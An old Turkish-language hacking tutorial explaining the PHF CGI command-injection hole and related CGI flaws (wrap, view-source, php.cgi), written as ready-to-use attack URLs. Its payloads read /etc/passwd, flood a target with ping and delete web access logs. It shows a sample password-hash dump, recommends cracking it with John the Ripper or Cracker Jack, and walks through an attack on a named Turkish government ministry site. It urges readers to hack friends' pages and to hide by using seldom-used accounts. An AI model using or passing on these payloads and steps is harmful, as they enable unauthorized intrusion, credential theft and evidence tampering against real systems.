|
|||||||
|
|
|
|||||
|
|
|||||||
WEB HACK UZERINE
WEB HACK NEDIR???
WEB hacking bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat bir cok eski server da hala uygulanmakta ve netice alinabilmektedir ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek gerekirse:
http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Satirini browserinize yazip enter e basin bu satir passwd dosyasini acmaya calisacaktir(adresi attim)
Error 404
/cgi-bin/phf is not found on this server
Bu satirlar karsiniza cikarsa bilinki server yeni ve size gecit vermiyor
Ama asagidaki listeyi verirse bilinki buldunuz:)))
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
asprilla:3A62i9qr.YmO.:1012:10:kafka
CAFER:/home/user/asprilla:/usr/local/bin/tcsh
hasan:dvUMqNmeeENFs:1016:10:lois figo:/home/user/hasan:/bin/csh
necmettin:ewF90K0gwXVD6:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh
güloglu:kFph8HEM/aaAA:1007:10:Kemal GULOGLU:/home/user/güloglu:/bin/csh
PHF teknigini arkadaslarinizin web page larini hack etmek icin deniye bilirsiniz:))) tabi yukardaki satirlari en iyi ihtimali goz onune alinarak yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yani asagidaki gibi:
root:*:0:1:Operator:/:/bin/csh
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
asprilla:*:1012:10:CAFER:/home/user/asprilla:/usr/local/bin/tcsh
hasan:*:1016:10:lois figo:/home/user/hasan:/bin/csh
necmettin:*:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh
güloglu:*:1007:10:kemal GULOGLU:/home/user/güloglu:/bin/csh
Bu tek * sifreleri kirdigini iddia eden bazi programlar var ama ben sadece guluyorum shadowed kirmak bence imkansiz ama yinede john the ripper i cekip deneyebilirsiniz.Hic bir teknik % 100 netice vermez bunu unutmayin.olaki bir shell aldiniz veya kirdiniz diyelim en az kullanilanini kullanin en son ne zaman kullanildigini anlamak icin shell in ait oldugu servere port 79 dan baglanin username ve pw i yazin en son baglanilan tarihi size verir az kullanilan accountlari kullanin.
SITELERI CGI/BIN
ACIKLARINDAN YARALANIP KIRMAK
a- (Phf scripti): Pek cok web ana bilgisayari CGI-BIN guvenli?inden
yoksundur. Bir de bunun uzerine sistem yöneticilerinin CGI-BIN guvenlik
aciklarini bilmemesi potansiyel sistem aciklarina yol acmaktadir. Tum
dunyada pek cok hacker'in kullandi?i cgi-bin guvenlik aci?i:
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd
Fakat bazi uyanik sistem yöneticileri phf komutunun kullanimini
sinirlamislardir. Bu yuzden bu komutu calistiramayabilirsiniz. Fakat yine
de alternatif web makinalari uzerinde denemekte yarar var.
b- (Wrap Scripti): Irix isletim sisteminin 6.2 versiyonunda rastlanan bu
hatayi da söyle istismar edebiliriz:
http://www.kiraca?imizadres.com.tr/cgi-bin/wrap?../../../etc/passwd
http://www.kiraca?imizadres.com.tr/cgi-bin/wrap?%0als (...)
Dikkat edece?imiz tek nokta bu hata sadece IRIX 6.2'de var. !!
c- (View Source Scripti): Denemek serbest (basariya ulasabilme
ihtimali kadar ulasamama ihtimali de var)
http://www.kiraca?imizadres.com.tr/cgi-bin/view-source?../../../etc/passwd
ya da
http://www.kiraca?imizadres.com.tr/cgi-bin/view-source?%1b or
%0a %20
d- (php.cgi Scripti):
http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd
e- Di?er Denenebilir Scriptler:
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s
%205000%20ip%20to%20shoot
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log
Mantik : phf sistemlerde bulunan bir acikdir ve bu acik sayesinde sisteme
web uzerinden baglanip shellde bazi komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd, ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...
--------------------------------------
Ozellikler : phf sayesinde her hangi bir serverdan elinizde acc olmadan
passwd dosyasini alabilir ve kirabilirsiniz...Bu olay web uzerinden
olur ve hizli olur |:)~ eNJOy!
--------------------------------------
Kullanim : phf nin kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin
sonu asagidaki
satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar.../cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlarsistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd
etc dizinin altindaki passwd dosyasini goruntuler burda %20 bosluk oldugunu
belirtir yani :/cgi-bin/phf?Qalias=x%0als yazarsaniz bulundugunuz dizindeki dosyalar
goruntulenir.../cgi-bin/phf?Qalias=x%0als%20pass*
yazarsaniz bulundugunuz dizinde pass ile baslayan butun dosyalari listeler...
Komutun Kullanimi Kolay!
Simdi Biraz Ornek Cozelim!
--------------------------------------
Evet bu ornek kesinlikle ogretim amacli cozulmusdur herhangi bir art niyetim
yok |;)~
Hedef : T.C. Saglik Bakanligi
Gerekli Bilgiler : Sadece web sayfalarinin
adresi : www.saglik.gov.tr
Browser inizi calistirin...
Adres olarak www.saglik.gov.tr yazin.Evet sayfa geldi simdi bakalim phf acigi var mi ?
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0als
yazin!
tamam dosya listesi karsimiza geldigine gore phf olayi isliyor...
Simdi passwd dosyasini alalim...cat /etc/passwd komutu ile...
bu nu phf ile asagidaki gibi yaziliyor...
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
tamam Ok dir password dosyasini gordunuz! bunu simdi cut/copy/paste ile bir
dosyaya saklayin...Internet baglantisini kesin ve dos moduna
gecin... Sakladiginiz dosyayi Cracker Jack adli programin bulundugu dizine kopyalayin.
Eger daha onceden hazirladiginiz bir wordlist varsa Cracker Jack ile "passwd"
dosyasini kirmaya baslayin Cracker Jack passwd dosyasindaki acclari kirmaya baslar... Bu
islem
gunlerce surer ve kirdigi acclari kullanabilirsiniz...